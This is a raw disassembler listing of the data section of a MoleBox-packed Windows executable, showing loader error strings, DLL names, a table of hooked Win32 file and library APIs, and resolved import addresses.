dword_510BE4 dd 2A2E2Ah ; DATA XREF: sub_4FC06B+26�o
off_510BE8 dd offset aAvicap32_dll ; DATA XREF: sub_504AB0:loc_504BDD�r
; sub_504AB0+139�w ...
; "avicap32.dll"
aTheUncompressi db 'The uncompression error',0
aExecutable db 'EXECUTABLE',0 ; DATA XREF: sub_504AB0+14B�o
; sub_504DC0+220�o
align 10h
aTheDynamicLink db 'The dynamic link library ',27h,'%s',27h,' could not be found',0
; DATA XREF: sub_504AB0+123�o
align 4
aOleaout32_dll db 'oleaout32.dll',0 ; DATA XREF: sub_504DC0+295�o
align 4
aOleoaut32_dll db 'oleoaut32.dll',0 ; DATA XREF: sub_504DC0:loc_505041�o
align 4
aImm32_dll db 'imm32.dll',0 ; DATA XREF: sub_504DC0:loc_50501F�o
; sub_504DC0+273�o
align 10h
loc_510C70: ; DATA XREF: sub_5061E1+B67�o
pop eax
push 0FF00FF00h
push 0FF00FF00h
push 0FF00FF00h
push eax
push 0FF00FF00h
retn
; ---------------------------------------------------------------------------
align 4
dword_510C88 dd 6C6C642Eh, 0 ; DATA XREF: sub_50581E+19�o
; sub_50581E+32�o
aDProjectsMy_sr db 'D:\Projects\My.SRC\MoleStudio\MoleBox\molebox2\bootup\mbx_DLL.cpp'
; DATA XREF: sub_5061E1+D34�o
db 0
align 4
a_box_ db '_BOX_',0 ; DATA XREF: sub_5061E1+ADB�o
align 4
aGetcurrentdire db 'GetCurrentDirectoryA',0 ; DATA XREF: sub_507494+EE�o
align 4
aSetcurrentdire db 'SetCurrentDirectoryA',0 ; DATA XREF: sub_507494+C0�o
align 4
aMbx@X@_ db 'MBX@%X@*.###',0 ; DATA XREF: sub_507494+53�o
; sub_508892+E8�o
align 4
aStripped db '<stripped>',0 ; DATA XREF: _6:off_50E4FC�o
align 4
aAssertionFai_2 db 'ASSERTION failed',0 ; DATA XREF: _6:off_50E4F8�o
align 4
aMoleboxLaunche db 'MoleBox launcher fatal error',0 ; DATA XREF: _6:off_50E4F4�o
align 4
asc_510D5C: ; DATA XREF: sub_50848C+57�o
; sub_5084F7+2D�o
dw 0Ah
unicode 0, <>,0
aErrorAtSDReaso db 'Error at %s:%d',0Ah ; DATA XREF: sub_50848C+1E�o
db 0Ah
db 'Reason: ',0
align 4
aUp1_txt db '-up1.txt',0 ; DATA XREF: sub_508538:loc_508648�o
align 4
aUp_txt db '-up.txt',0 ; DATA XREF: sub_508538+BC�o
asc_510D90 db 0Dh,0Ah,0 ; DATA XREF: sub_508726+59�o
align 4
aWindowsErrorSA db 'windows error %s',0Ah ; DATA XREF: sub_5087CA+75�o
db ' at %s(%d)',0Ah,0
align 4
aMbx@X@X_ db 'MBX@%X@%X.###',0 ; DATA XREF: sub_508892+C2�o
align 4
aMbx@X@X@X_ db 'MBX@%X@%X@%X.###',0 ; DATA XREF: sub_508892+93�o
align 4
a__3 db '.###',0 ; DATA XREF: sub_508A16+175�o
align 10h
aMbx@ db 'MBX@',0 ; DATA XREF: sub_508A16+78�o
align 4
aInvalidDllRelo db 'INVALID DLL RELOCATION',0 ; DATA XREF: sub_508C27:loc_508E60�o
align 10h
aBadFuulname db 'BAD FUULNAME',0 ; DATA XREF: sub_508C27:loc_508E57�o
align 10h
aGetmodulenameE db 'GetModuleName ERROR',0 ; DATA XREF: sub_508C27:loc_508E4E�o
aHookingDllErro db 'HOOKING DLL ERROR',0 ; DATA XREF: sub_508C27:loc_508E45�o
align 4
aPackedDllOrBox db 'PACKED DLL OR BOXFILE CORRUPTED',0 ; DATA XREF: sub_508C27:loc_508E3C�o
aInvalidCompres db 'INVALID COMPRESSION/ENCRYPTION ALGORITHM',0
; DATA XREF: sub_508C27:loc_508E33�o
align 4
aDllCorrupted db 'DLL CORRUPTED',0 ; DATA XREF: sub_508C27:loc_508E2A�o
align 4
aHeapCorrupted db 'HEAP CORRUPTED',0 ; DATA XREF: sub_508C27:loc_508E21�o
align 4
aCouldNotCreate db 'COULD NOT CREATE HEAP',0 ; DATA XREF: sub_508C27:loc_508E18�o
align 4
aVirtualprote_0 db 'VIRTUALPROTECT BROKEN',0 ; DATA XREF: sub_508C27:loc_508E0F�o
align 4
aWrappersTableB db 'WRAPPERS TABLE BROKEN',0 ; DATA XREF: sub_508C27:loc_508E06�o
align 4
aOutOfMemory db 'OUT OF MEMORY',0 ; DATA XREF: sub_508C27:loc_508DFD�o
align 4
aFeatureIsNotIm db 'FEATURE IS NOT IMPLEMENTED',0 ; DATA XREF: sub_508C27:loc_508DF4�o
align 4
aBoxfileCorrupt db 'BOXFILE CORRUPTED',0 ; DATA XREF: sub_508C27:loc_508DEB�o
align 4
aReadBoxfileErr db 'READ BOXFILE ERROR',0 ; DATA XREF: sub_508C27:loc_508DE2�o
align 10h
aCouldNotOpenBo db 'COULD NOT OPEN BOXFILE',0 ; DATA XREF: sub_508C27:loc_508DD6�o
align 4
aPathIsVeryLong db 'PATH IS VERY LONG',0 ; DATA XREF: sub_508C27:loc_508DCA�o
align 4
aExecutableCorr db 'EXECUTABLE CORRUPTED',0 ; DATA XREF: sub_508C27:loc_508DBE�o
align 4
aDynamicLibrary db 'DYNAMIC LIBRARY IS NOT NT IMAGE',0 ; DATA XREF: sub_508C27:loc_508DB2�o
aExecutableIsNo db 'EXECUTABLE IS NOT NT IMAGE',0 ; DATA XREF: sub_508C27:loc_508DA6�o
align 10h
aHasNoAccessToE db 'HAS NO ACCESS TO EXECUTABLE',0 ; DATA XREF: sub_508C27:loc_508D9A�o
aAssertionFai_1 db 'ASSERTION FAILED',0 ; DATA XREF: sub_508C27:loc_508D8E�o
align 10h
aEsi0x08xEdi0x0 db 'ESI:0x%08X EDI:0x%08X',0 ; DATA XREF: sub_508C27+101�o
align 4
aEsp0x08xEbp0x0 db 'ESP:0x%08X EBP:0x%08X EIP:0x%08X',0 ; DATA XREF: sub_508C27+DC�o
align 4
aEax0x08xEdx0x0 db 'EAX:0x%08X EDX:0x%08X ECX:0x%08X',0 ; DATA XREF: sub_508C27+AB�o
align 10h
aEs0x08xFs0x08x db 'ES :0x%08X FS :0x%08X GS :0x%08X',0 ; DATA XREF: sub_508C27+7A�o
align 4
aCs0x08xSs0x08x db 'CS :0x%08X SS :0x%08X DS :0x%08X',0 ; DATA XREF: sub_508C27+49�o
align 4
a__seh__0xXAt0x db '__SEH__ 0x%x at 0x%x',0 ; DATA XREF: sub_508C27+18�o
align 10h
aCc7574e45e3947 db '{CC7574E4-5E39-4700-B286-269A82DD8E95}',0 ; DATA XREF: sub_4FC271+40�o
; sub_4FC271+E2�o
align 4
a_splashscreen_ db '_splashscreen.bmp',0 ; DATA XREF: sub_4FC3F3+12�o
align 4
aBroken0x08x db '!broken!0x%08x:',0 ; DATA XREF: sub_508EF3+FB�o
a0x08xS03x08x db '0x%08x:[%s]:(%03x:%08x)',0 ; DATA XREF: sub_508EF3+CA�o
aUnknown_0 db 'unknown',0 ; DATA XREF: sub_508EF3+B7�o
a0x08xUnknownUn db '0x%08x:[unknown]:unknown',0 ; DATA XREF: sub_508EF3+60�o
align 4
aBroken db '!broken!',0 ; DATA XREF: sub_508EF3+31�o
align 4
a0x08x0x08x0x08 db '0x%08x: 0x%08x 0x%08x 0x%08x 0x%08x',0 ; DATA XREF: sub_50918E+F9�o
aStack db '--stack--',0 ; DATA XREF: sub_50918E:loc_509242�o
align 4
a___OpssBrokenB db ' ... opss, broken by SEH',0 ; DATA XREF: sub_50918E+A5�o
; sub_50918E+11E�o
align 10h
aS_32 db ' %s',0 ; DATA XREF: sub_50918E+47�o
; sub_50918E+8A�o
align 4
aBacktrace db '-- backtrace --',0 ; DATA XREF: sub_50918E+28�o
dd 2 dup(0FFFFFFFFh)
aDllgetclassobj db 'DllGetClassObject',0 ; DATA XREF: sub_50931F+51�o
; sub_50B076+39�o
align 8
dword_5111C8 dd 2 dup(0) ; DATA XREF: sub_5093B3+55�o
dd 0C0h, 46000000h
dword_5111D8 dd 1, 0 ; DATA XREF: sub_5093B3+11�o
dd 0C0h, 46000000h
aRegqueryvaluea db 'RegQueryValueA',0 ; DATA XREF: sub_509638+42�o
align 4
aAdvapi32_dll_0 db 'ADVAPI32.DLL',0 ; DATA XREF: sub_509638+3D�o
align 4
aClsid08x04x04x db 'CLSID\{%08x-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x}\InprocSe'
; DATA XREF: sub_50971C+58�o
db 'rver32',0
off_511250 dd offset sub_509C54 ; DATA XREF: sub_509DD4+102�o
dd offset aSetunhandled_0 ; "SetUnhandledExceptionFilter"
dd offset sub_50B2B0
dd offset aCreatefilea_1 ; "CreateFileA"
dd offset sub_50B2FE
dd offset aCreatefilew_0 ; "CreateFileW"
dd offset sub_50A7AF
dd offset aGetfileattri_3 ; "GetFileAttributesA"
dd offset sub_50A7DD
dd offset aGetfileattri_4 ; "GetFileAttributesW"
dd offset sub_50A8AA
dd offset aGetfileattri_5 ; "GetFileAttributesExW"
dd offset sub_50B3FC
dd offset aReadfile_2 ; "ReadFile"
dd offset sub_50B3D5
dd offset aClosehandle_1 ; "CloseHandle"
dd offset sub_50B460
dd offset aSetfilepoint_1 ; "SetFilePointer"
dd offset sub_50A9EC
dd offset aGetfilesize_0 ; "GetFileSize"
dd offset sub_50A0C8
dd offset aExitprocess_1 ; "ExitProcess"
dd offset sub_50B4A4
dd offset aCreatefilema_2 ; "CreateFileMappingA"
dd offset sub_50B4E0
dd offset aCreatefilema_3 ; "CreateFileMappingW"
dd offset sub_50B51C
dd offset aMapviewoffil_0 ; "MapViewOfFile"
dd offset sub_50B55B
dd offset aUnmapviewoff_0 ; "UnmapViewOfFile"
dd offset sub_50B18D
dd offset aFreelibrary_0 ; "FreeLibrary"
dd offset sub_50AE83
dd offset aLoadlibrarya_0 ; "LoadLibraryA"
dd offset sub_50AF65
dd offset aLoadlibraryw ; "LoadLibraryW"
dd offset sub_50AE96
dd offset aLoadlibrarye_0 ; "LoadLibraryExA"
dd offset sub_50AF78
dd offset aLoadlibraryexw ; "LoadLibraryExW"
dd offset sub_50B076
dd offset aGetprocaddre_0 ; "GetProcAddress"
dd offset sub_50A334
dd offset aFindfirstfil_1 ; "FindFirstFileA"
dd offset sub_50A361
dd offset aFindfirstfilew ; "FindFirstFileW"
dd offset sub_50A4AA
dd offset aFindfirstfilee ; "FindFirstFileExW"
; ---------------------------------------------------------------------------
jmp dword ptr [ebp-17BBFFB0h]
; ---------------------------------------------------------------------------
dw 50h
dd offset sub_50A626
dd offset aFindnextfile_1 ; "FindNextFileA"
dd offset sub_50A657
dd offset aFindnextfilew ; "FindNextFileW"
dd offset sub_50B582
dd offset aOpenfile ; "OpenFile"
dd offset sub_50B636
dd offset a_lopen ; "_lopen"
dd offset sub_50B677
dd offset a_lclose ; "_lclose"
dd offset sub_50B711
dd offset a_lread ; "_lread"
dd offset sub_50B6CC
dd offset a_llseek ; "_llseek"
dd offset sub_50AF8C
dd offset aGetmodulehan_0 ; "GetModuleHandleA"
dd offset sub_50AFC6
dd offset aGetmodulehan_1 ; "GetModuleHandleW"
dd offset sub_50A226
dd offset aSearchpathw ; "SearchPathW"
dd offset sub_50A1C7
dd offset aSearchpatha_0 ; "SearchPathA"
dd offset sub_50AC66
dd offset aGetprivatepr_2 ; "GetPrivateProfileStringA"
dd offset sub_50AD0C
dd offset aGetprivatepr_3 ; "GetPrivateProfileIntA"
dd offset sub_50AD93
dd offset aGetprivatepr_4 ; "GetPrivateProfileSectionNamesA"
dd offset sub_50ADDE
dd offset aGetprivatepr_5 ; "GetPrivateProfileSectionA"
dd offset sub_50A710
dd offset aGetfileinfor_0 ; "GetFileInformationByHandle"
dd offset sub_50A741
dd offset aLockfile_0 ; "LockFile"
dd offset sub_50A77D
dd offset aUnlockfile_0 ; "UnlockFile"
dd offset sub_50AA24
dd offset aGetmodulefil_1 ; "GetModuleFileNameA"
dd offset sub_50AA5E
dd offset aGetmodulefil_2 ; "GetModuleFileNameW"
dd offset sub_50AAEB
dd offset aGetlongpathn_1 ; "GetLongPathNameA"
dd offset sub_50AB3D
dd offset aGetlongpathn_2 ; "GetLongPathNameW"
off_5113C8 dd offset sub_50B23E ; DATA XREF: sub_509DD4+116�o
dd offset aAddfontresou_0 ; "AddFontResourceA"
dd offset sub_50B277
dd offset aRemovefontre_0 ; "RemoveFontResourceA"
off_5113D8 dd offset sub_50B1EA ; DATA XREF: sub_509DD4+12A�o
dd offset aLoadimagea_0 ; "LoadImageA"
off_5113E0 dd offset sub_509518 ; DATA XREF: sub_509DD4+13E�o
dd offset aCocreateinstan ; "CoCreateInstance"
dd offset sub_509789
dd offset aCocreateinst_0 ; "CoCreateInstanceEx"
dd offset sub_5098C0
dd offset aCogetclassobje ; "CoGetClassObject"
off_5113F8 dd offset sub_509A34 ; DATA XREF: sub_509DD4+152�o
dd offset aGetrecordinf_0 ; "GetRecordInfoFromGuids"
dd offset sub_509B3C
dd offset aLoadregtypelib ; "LoadRegTypeLib"
aGetfileattri_1 db 'GetFileAttributesExW',0 ; DATA XREF: sub_50A8AA+F0�o
align 10h
aGetlongpathn_0 db 'GetLongPathNameW',0 ; DATA XREF: sub_50AB3D+A8�o
align 4
dword_511434 dd 19930520h, 500829h, 158h, 12F578h, 3 dup(0) ; DATA XREF: _5:004FC523�o
; sub_4FC52A+2�o
off_511450 dd offset word_51145A ; DATA XREF: sub_4FC86E:loc_4FC8BD�r
; sub_4FC86E:loc_4FC8CF�r ...
dd offset word_51145A
db 2 dup(0)
word_51145A dw 20h ; DATA XREF: _7:off_511450�o
; _7:00511454�o
unicode 0, < ((((( H>
dd 7 dup(100010h), 840010h, 4 dup(840084h), 100084h, 3 dup(100010h)
dd 3 dup(810081h), 0Ah dup(10001h), 3 dup(100010h), 3 dup(820082h)
dd 0Ah dup(20002h), 2 dup(100010h), 20h, 40h dup(0)
dword_51165C dd 1 ; DATA XREF: sub_4FC86E+3C�r
; sub_4FC9EA:loc_4FC9F2�r ...
dd 2Eh, 1, 2 dup(0)
dword_511670 dd 77E64C09h ; DATA XREF: sub_4FD2E0+1DF�w
; sub_4FD2E0+1F6�r ...
dword_511674 dd 950000h ; DATA XREF: _5:004FDED3�w _5:004FDF0F�r
dword_511678 dd 970000h ; DATA XREF: _5:004FDF0A�w _5:004FDF1B�r
dword_51167C dd 960000h ; DATA XREF: _5:004FDEF4�w
dword_511680 dd 2 ; DATA XREF: _5:004FE0BC�r
; sub_504DC0+59�r ...
dword_511684 dd 941F18h ; DATA XREF: _5:004FE206�r
; _5:loc_4FE28F�r ...
dword_511688 dd 4FDB3Eh ; DATA XREF: sub_4FDE50+3�r
; _5:004FDE6F�w
dword_51168C dd 0FFFFFFFFh ; DATA XREF: sub_4FD2E0+213�w
; sub_4FD2E0+387�r ...
dd 0
byte_511694 db 0 ; DATA XREF: _5:004FE2A1�w
; sub_50581E+E�r
align 4
dword_511698 dd 8 ; DATA XREF: sub_4FD2E0+407�w
; sub_504DC0:loc_504E0D�r
off_51169C dd offset a_text ; DATA XREF: sub_4FD2E0+410�w
; _5:loc_4FEC97�r ...
; ".text"
dword_5116A0 dd 0 ; DATA XREF: sub_4FE2E0+8B3�o
dword_5116A4 dd 77E77963h ; DATA XREF: sub_4FE2E0+3A�w
; sub_4FE2E0+881�o ...
dword_5116A8 dd 77E7A837h ; DATA XREF: sub_4FE2E0+4E�w
; _5:004FEC0C�r ...
dword_5116AC dd 77E779B1h ; DATA XREF: sub_4FE2E0+62�w
; sub_50B2FE+9F�r
dword_5116B0 dd 77E77797h ; DATA XREF: sub_4FE2E0+76�w
; _5:004FEC40�r ...
dword_5116B4 dd 77E776D3h ; DATA XREF: sub_4FE2E0+8A�w
; sub_50B4E0+2C�r
dword_5116B8 dd 77E61BB8h ; DATA XREF: sub_4FE2E0+9E�w
; sub_5071C3+E6�r
dword_5116BC dd 77EB36A5h ; DATA XREF: sub_4FE2E0+B2�w
dword_5116C0 dd 77E73628h ; DATA XREF: sub_4FE2E0+C6�w
; sub_4FF94C+2EA�r ...
dword_5116C4 dd 77F7E21Fh ; DATA XREF: sub_4FE2E0+DA�w
; sub_4FF252+2A�r ...
dword_5116C8 dd 77E75CB5h ; DATA XREF: sub_4FE2E0+EE�w
; sub_50A0C8+AF�r
dword_5116CC dd 77E78EAAh ; DATA XREF: sub_4FE2E0+102�w
; sub_502DD0+5E2�r ...
dword_5116D0 dd 77E75D9Eh ; DATA XREF: sub_4FE2E0+116�w
; sub_4FF6DE+B4�r ...
dword_5116D4 dd 77E75E67h ; DATA XREF: sub_4FE2E0+12A�w
; sub_4FF6DE+DC�r ...
dword_5116D8 dd 77E73FF9h ; DATA XREF: sub_4FE2E0+13E�w
; sub_5061E1+CFE�r
dword_5116DC dd 77E76A60h ; DATA XREF: sub_4FE2E0+152�w
; sub_5087CA+60�r
dword_5116E0 dd 77E80618h ; DATA XREF: sub_4FE2E0+166�w
; sub_5058CF+163�r ...
dword_5116E4 dd 77E79C90h ; DATA XREF: sub_4FE2E0+17A�w
; sub_5071C3+4B�r ...
dword_5116E8 dd 77E80656h ; DATA XREF: sub_4FC216+15�r
; sub_4FE2E0+18E�w ...
dword_5116EC dd 77E7AC5Eh ; DATA XREF: sub_4FE2E0+1A2�w
dword_5116F0 dd 77E7FF65h ; DATA XREF: sub_4FE2E0+1B6�w
dword_5116F4 dd 77E74CABh ; DATA XREF: sub_4FE2E0+1CA�w
; sub_50A7AF+16�r
dword_5116F8 dd 77E78536h ; DATA XREF: sub_4FE2E0+1DE�w
; sub_50A7DD+84�r
dword_5116FC dd 77E72EA0h ; DATA XREF: sub_4FE2E0+1F2�w
; sub_500858+83�r ...
dword_511700 dd 77E793EFh ; DATA XREF: sub_4FE2E0+206�w
; _5:004FEC21�r ...
dword_511704 dd 77E73CE2h ; DATA XREF: sub_4FE2E0+21A�w
; sub_503610+720�r
dword_511708 dd 77E80357h ; DATA XREF: sub_4FE2E0+22E�w
; sub_4FF252+71�r ...
dword_51170C dd 77E781DBh ; DATA XREF: sub_4FE2E0+242�w
; sub_50A226+92�r
dword_511710 dd 77F5157Dh ; DATA XREF: sub_4FE2E0+256�w
; sub_5058CF+14E�r ...
dword_511714 dd 77E7A099h ; DATA XREF: sub_4FE2E0+26A�w
; _5:004FEE99�r ...
dword_511718 dd 77E79F93h ; DATA XREF: sub_4FC271+4C�r
; _5:004FDE79�r ...
dword_51171C dd 77E719F3h ; DATA XREF: sub_4FE2E0+292�w
; sub_50AD0C+76�r
dword_511720 dd 77E61FD2h ; DATA XREF: sub_4FE2E0+2A6�w
; sub_50AD93+3B�r
dword_511724 dd 77E72C64h ; DATA XREF: sub_4FE2E0+2BA�w
; sub_50AC66+95�r
dword_511728 dd 77E7A5FDh ; DATA XREF: _5:004FDEA2�r
; sub_4FE2E0+2CE�w ...
dword_51172C dd 77E6167Bh ; DATA XREF: sub_4FE2E0+2E2�w
; sub_500C5C+97�r ...
dword_511730 dd 77E6AF8Fh ; DATA XREF: sub_4FE2E0+2F6�w
; sub_4FF94C+1A6�r
dword_511734 dd 77E6AD34h ; DATA XREF: sub_4FE2E0+30A�w
; sub_4FF94C+193�r ...
dword_511738 dd 77E7C657h ; DATA XREF: sub_4FE2E0+31E�w
dword_51173C dd 77E7751Ah ; DATA XREF: _5:004FDEDF�r
; sub_4FE2E0+332�w
dword_511740 dd 77F516F8h ; DATA XREF: sub_4FE2E0+346�w
; sub_50835A+1F�r
dword_511744 dd 77F51597h ; DATA XREF: sub_4FE2E0+35A�w
; sub_5083DD+1C�r
dword_511748 dd 77E7C726h ; DATA XREF: sub_4FE2E0+36E�w
; sub_508397+16�r
dword_51174C dd 77E79908h ; DATA XREF: sub_4FE2E0+382�w
; sub_502DD0+2E�r ...
dword_511750 dd 77F53275h ; DATA XREF: sub_4FE2E0+396�w
; sub_50B82A+2B�r
dword_511754 dd 77F7E300h ; DATA XREF: sub_4FE2E0+3AA�w
; sub_4FF61F+5�r ...
dword_511758 dd 77E805B8h ; DATA XREF: sub_4FE2E0+3D2�w
; sub_5061E1+17F�r
dword_51175C dd 77E805D8h ; DATA XREF: sub_4FE2E0+3BE�w
; sub_4FE2E0+5D0�r ...
dword_511760 dd 77E79881h ; DATA XREF: sub_4FE2E0+3E6�w
dword_511764 dd 77E79A45h ; DATA XREF: sub_4FE2E0+3FA�w
; sub_508864+9�r
dword_511768 dd 77E64E2Bh ; DATA XREF: sub_4FE2E0+40E�w
; sub_50A741+23�r
dword_51176C dd 77E74D76h ; DATA XREF: sub_4FE2E0+422�w
; _5:004FEC5D�r ...
dword_511770 dd 77E77CCEh ; DATA XREF: sub_4FE2E0+436�w
; sub_509A34+69�r ...
dword_511774 dd 77E706B7h ; DATA XREF: sub_4FE2E0+44A�w
dword_511778 dd 77E6D706h ; DATA XREF: _5:004FDE93�r _5:004FDEBC�r ...
dword_51177C dd 77E78B82h ; DATA XREF: sub_4FE2E0+472�w
; _5:00500B0B�r ...
dword_511780 dd 77E6BD68h ; DATA XREF: sub_4FE2E0+486�w
dword_511784 dd 77E74A3Bh ; DATA XREF: sub_4FE2E0+49A�w
; sub_50B3FC+57�r
dword_511788 dd 77E78C81h ; DATA XREF: sub_4FE2E0+4AE�w
; sub_500346+74�r ...
dword_51178C dd 77F51587h ; DATA XREF: sub_4FE2E0+4C2�w
; sub_4FF252+3BC�r ...
dword_511790 dd 77E7C9E7h ; DATA XREF: sub_4FE2E0+4D6�w
; sub_508C17+8�r ...
dword_511794 dd 77E61BE6h ; DATA XREF: sub_4FC271+137�r
; sub_4FC271+16A�r ...
dword_511798 dd 77E616B4h ; DATA XREF: sub_4FE2E0+4FE�w
; sub_508401+2D�r ...
dword_51179C dd 77E64EA0h ; DATA XREF: sub_4FE2E0+512�w
; sub_50A77D+23�r
dword_5117A0 dd 77E75090h ; DATA XREF: sub_4FE2E0+526�w
; sub_4FEDE4:loc_4FEDEE�r ...
dword_5117A4 dd 77E7980Ah ; DATA XREF: sub_4FE2E0+53A�w
; sub_4FFFBF+125�r ...
dword_5117A8 dd 77E79E34h ; DATA XREF: sub_4FE2E0+54E�w
; sub_4FFECD+91�r ...
dword_5117AC dd 77E6169Ah ; DATA XREF: sub_4FE2E0+562�w
; sub_4FFFBF+14B�r ...
dword_5117B0 dd 77E7F044h ; DATA XREF: sub_4FE2E0+576�w
; sub_508EF3+56�r
dword_5117B4 dd 77E79D5Bh ; DATA XREF: sub_4FE2E0+58A�w
dword_5117B8 dd 77E79924h ; DATA XREF: sub_4FE2E0+59E�w
; sub_50A226+6A�r ...
dword_5117BC dd 77E79D8Ch ; DATA XREF: sub_4FE2E0+5B2�w
; sub_4FF94C+282�r ...
dword_5117C0 dd 77E76A2Eh ; DATA XREF: sub_4FE2E0+5C6�w
; sub_501CC4+1E2�r ...
dword_5117C4 dd 77D98E9Ah ; DATA XREF: sub_4FE2E0+5FF�w
; sub_508401+B�r ...
dword_5117C8 dd 77D44D9Bh ; DATA XREF: sub_4FE2E0+613�w
; sub_4FF252+88�r ...
dword_5117CC dd 77D4D42Bh ; DATA XREF: sub_4FE2E0+627�w
; sub_50B1EA+44�r
dword_5117D0 dd 77D6ADD7h ; DATA XREF: sub_4FE2E0+63B�w
; sub_508401+1E�r ...
dword_5117D4 dd 77D4C96Ah ; DATA XREF: sub_4FE2E0+64F�w
; sub_507494+5D�r ...
dword_5117D8 dd 77D4C783h ; DATA XREF: sub_4FE2E0+663�w
; sub_50848C+45�r ...
dword_5117DC dd 77C87425h ; DATA XREF: sub_4FE2E0+69C�w
; sub_4FF94C+2D4�r
dword_5117E0 dd 77C7212Fh ; DATA XREF: sub_4FC15E+41�r
; sub_4FE2E0+6B0�w ...
dword_5117E4 dd 77C76551h ; DATA XREF: sub_4FE2E0+6C4�w
; sub_505456+1D1�r
dword_5117E8 dd 77C72C6Bh ; DATA XREF: sub_4FC15E+8A�r
; sub_4FE2E0+6D8�w ...
dword_5117EC dd 77C87887h ; DATA XREF: sub_4FE2E0+6EC�w
; sub_4FFD24+E6�r ...
dword_5117F0 dd 77D458EEh ; DATA XREF: sub_4FC15E+38�r
; sub_4FE2E0+700�w
dword_5117F4 dd 77D458FDh ; DATA XREF: sub_4FC15E+97�r
; sub_4FE2E0+714�w
dword_5117F8 dd 77C7506Dh ; DATA XREF: sub_4FC15E+2B�r
; sub_4FC271+26�r ...
dword_5117FC dd 77C71BB0h ; DATA XREF: sub_4FC15E+53�r
; sub_4FC15E+81�r ...
dword_511800 dd 77C72889h ; DATA XREF: sub_4FC271+175�r
; sub_4FE2E0+750�w
dword_511804 dd 77C729E2h ; DATA XREF: sub_4FC15E+75�r
; sub_4FE2E0+764�w
dword_511808 dd 77D45CBCh ; DATA XREF: sub_4FC216+F�r
; sub_4FE2E0+778�w
dword_51180C dd 77D48977h ; DATA XREF: sub_4FC216+41�r
; sub_4FE2E0+78C�w
dword_511810 dd 77D47F34h ; DATA XREF: sub_4FC216+4A�r
; sub_4FE2E0+7A0�w
dword_511814 dd 77D4DCCCh ; DATA XREF: sub_4FC271+5C�r
; sub_4FE2E0+7B4�w
dword_511818 dd 77D477C0h ; DATA XREF: sub_4FC271+64�r
; sub_4FC271+6F�r ...
dword_51181C dd 77D414D4h ; DATA XREF: sub_4FC271+E9�r
; sub_4FE2E0+7DC�w
dword_511820 dd 77D44200h ; DATA XREF: sub_4FC271+105�r
; sub_4FE2E0+7F0�w
dword_511824 dd 77D43DD3h ; DATA XREF: sub_4FC271+123�r
; sub_4FE2E0+804�w
dword_511828 dd 77D441F2h ; DATA XREF: sub_4FC271+12D�r
; sub_4FE2E0+818�w
dword_51182C dd 77D49A11h ; DATA XREF: sub_4FC216+31�r
; sub_4FE2E0+82C�w
dword_511830 dd 77D47627h ; DATA XREF: sub_4FC271+157�r
; sub_4FE2E0+840�w
dword_511834 dd 77D46F5Bh ; DATA XREF: sub_4FE2E0+854�w
dword_511838 dd 77D442CFh ; DATA XREF: _5:004FE2C7�r
; sub_4FE2E0+868�w
dword_51183C dd 77E7AC37h ; DATA XREF: sub_4FC3F3+45�r
; sub_4FE2E0+87C�w
dword_511840 dd 0 ; DATA XREF: sub_4FE2E0+888�o
byte_511844 db 0 ; DATA XREF: sub_4FF166+69�o
; sub_4FF166+7F�w ...
align 4
dd 20h dup(0)
dword_5118C8 dd 77FC5940h, 0FFFFFFFFh, 4 dup(0) ; DATA XREF: sub_4FF252+25�o
; sub_4FF61F�o ...
dword_5118E0 dd 9C0538h ; DATA XREF: sub_4FFECD+25�r
; sub_4FFECD+5D�r ...
dword_5118E4 dd 9C00A8h ; DATA XREF: sub_4FF036+50�r
; sub_4FF036+8E�r ...
dword_5118E8 dd 9C02F0h ; DATA XREF: sub_4FF94C:loc_4FFA1E�r
; sub_4FF94C+10B�r ...
dword_5118EC dd 9C0780h ; DATA XREF: sub_4FF63E+7E�r
; sub_4FF6DE+25�r ...
dword_5118F0 dd 0 ; DATA XREF: sub_502D50+8�r
; sub_502D50+19�r
dword_5118F4 dd 0 ; DATA XREF: sub_502D50+10�r
dword_5118F8 dd 980048h ; DATA XREF: _5:00500A28�r _5:00500AFF�r ...
dword_5118FC dd 990090h ; DATA XREF: sub_502DD0+660�w
; _7:off_510B80�o
dword_511900 dd 9A0098h ; DATA XREF: sub_502DD0+67E�w
; _7:00510B98�o
dword_511904 dd 9B00A0h ; DATA XREF: sub_502DD0+69D�w
; _7:00510BB0�o
dword_511908 dd 942518h ; DATA XREF: sub_4FF252+34�r
; sub_4FF252+5E�r ...
dword_51190C dd 943140h ; DATA XREF: sub_502DD0+227�w
; sub_502DD0+235�r ...
dword_511910 dd 4000E0h ; DATA XREF: sub_503610+D8�w
; sub_503610+DE�r ...
dword_511914 dd 0 ; DATA XREF: sub_504D70+4�r
; sub_504D70+C�w ...
dword_511918 dd 2 dup(0) ; DATA XREF: sub_4FC271+DD�o
; sub_50AD0C+37�o
dword_511920 dd 0 ; DATA XREF: sub_507333+11�r
; sub_507494+22�w ...
align 8
dword_511928 dd 0 ; DATA XREF: sub_505BD7+3AB�w
; sub_505BD7+3DB�w ...
align 10h
dword_511930 dd 77FC5880h, 0FFFFFFFFh, 4 dup(0) ; DATA XREF: sub_4FD2E0+3B3�o
; sub_5061E1+73�o ...
dword_511948 dd 0 ; DATA XREF: sub_507333+24�w
; sub_507333+29�r ...
dword_51194C dd 9423B8h ; DATA XREF: sub_505BD7+22A�r
; sub_505FCD+12�r ...
dword_511950 dd 942478h ; DATA XREF: sub_509DD4+F6�w
dword_511954 dd 942418h ; DATA XREF: sub_5058CF+1A�r
; sub_505BD7:loc_505D97�r ...
dword_511958 dd 0 ; DATA XREF: sub_5061E1+D0D�w
; sub_5071C3+5F�r
dword_51195C dd 0 ; DATA XREF: sub_5058A0+3�r
; sub_5058A0+1D�w ...
dword_511960 dd 0 ; DATA XREF: sub_505BD7+3B5�r
; sub_505BD7+3C6�w ...
dword_511964 dd 0 ; DATA XREF: sub_5061E1+82�r
; sub_5061E1+E3�r ...
dword_511968 dd 0 ; DATA XREF: sub_5061E1+105�r
; sub_5061E1+10B�w ...
dword_51196C dd 0 ; DATA XREF: sub_50613C+5�r
; sub_50614D+A�r ...
dword_511970 dd 0 ; DATA XREF: sub_507333+9B�r
; sub_507494+9E�w ...
dword_511974 dd 0 ; DATA XREF: sub_507333+A8�r
; sub_507494+CC�w ...
dword_511978 dd 0 ; DATA XREF: sub_507333+BA�r
; sub_507494+FA�w ...
dword_51197C dd 0 ; DATA XREF: sub_507333+D4�r
; sub_507494+128�w ...
dword_511980 dd 0 ; DATA XREF: sub_507333+F0�r
; sub_507333+10C�r ...
dword_511984 dd 0 ; DATA XREF: sub_507333+11E�r
; sub_507333+135�r ...
